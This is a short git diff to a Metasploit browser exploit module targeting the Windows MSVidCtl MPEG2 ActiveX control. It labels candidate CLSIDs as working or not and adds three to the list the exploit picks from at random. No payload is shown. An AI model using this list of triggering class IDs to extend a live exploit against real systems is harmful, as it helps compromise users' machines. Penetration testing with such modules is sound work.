diff --git a/modules/exploits/windows/browser/msvidctl_mpeg2.rb b/modules/exploits/windows/browser/msvidctl_mpeg2.rb index 1374aa6269..387a6f9cfe 100644 --- a/modules/exploits/windows/browser/msvidctl_mpeg2.rb +++ b/modules/exploits/windows/browser/msvidctl_mpeg2.rb @@ -96,12 +96,12 @@ class Metasploit3 < Msf::Exploit::Remote "011B3619-FE63-4814-8A84-15A194CE9CE3", # doesn't work "0149EEDF-D08F-4142-8D73-D23903D21E90", # doesn't work "0369B4E5-45B6-11D3-B650-00C04F79498E", # works - "0369B4E6-45B6-11D3-B650-00C04F79498E", - "055CB2D7-2969-45CD-914B-76890722F112", + "0369B4E6-45B6-11D3-B650-00C04F79498E", # works + "055CB2D7-2969-45CD-914B-76890722F112", # works "0955AC62-BF2E-4CBA-A2B9-A63F772D46CF", # works - "15D6504A-5494-499C-886C-973C9E53B9F1", - "1BE49F30-0E1B-11D3-9D8E-00C04F72D980", - "1C15D484-911D-11D2-B632-00C04F79498E", + "15D6504A-5494-499C-886C-973C9E53B9F1", # works + "1BE49F30-0E1B-11D3-9D8E-00C04F72D980", # doesn't work + "1C15D484-911D-11D2-B632-00C04F79498E", # doesn't work "1DF7D126-4050-47F0-A7CF-4C4CA9241333", "2C63E4EB-4CEA-41B8-919C-E947EA19A77C", "334125C0-77E5-11D3-B653-00C04F79498E", @@ -140,8 +140,11 @@ class Metasploit3 < Msf::Exploit::Remote "FA7C375B-66A7-4280-879D-FD459C84BB02" ] clsids = [ # these all work - "0369B4E5-45B6-11D3-B650-00C04F79498E", - "0955AC62-BF2E-4CBA-A2B9-A63F772D46CF", + "0369B4E5-45B6-11D3-B650-00C04F79498E", # works + "0369B4E6-45B6-11D3-B650-00C04F79498E", # works + "055CB2D7-2969-45CD-914B-76890722F112", # works + "0955AC62-BF2E-4CBA-A2B9-A63F772D46CF", # works + "15D6504A-5494-499C-886C-973C9E53B9F1", # works ] classid = datastore['ClassID'] || clsids[rand(clsids.size)]